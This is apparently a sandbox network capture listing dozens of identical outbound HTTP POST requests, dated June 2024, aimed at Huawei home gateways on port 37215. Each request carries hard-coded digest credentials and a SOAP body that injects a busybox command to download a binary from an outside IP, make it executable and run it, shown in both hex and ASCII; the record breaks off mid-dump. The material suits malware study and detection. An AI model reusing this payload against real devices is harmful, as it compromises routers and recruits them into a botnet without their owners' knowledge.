                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2454192.168.2.153866641.147.51.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815242052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2455192.168.2.154618241.46.62.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815346003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2456192.168.2.156080641.172.123.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815376997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2457192.168.2.155281241.8.158.10737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815404892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2458192.168.2.153706841.27.107.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815429926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2459192.168.2.155779441.65.52.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815454960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2460192.168.2.155931241.254.88.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815479040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2461192.168.2.156014241.248.66.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815511942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2462192.168.2.153675241.141.243.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815541983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2463192.168.2.154125841.199.134.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.815567017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 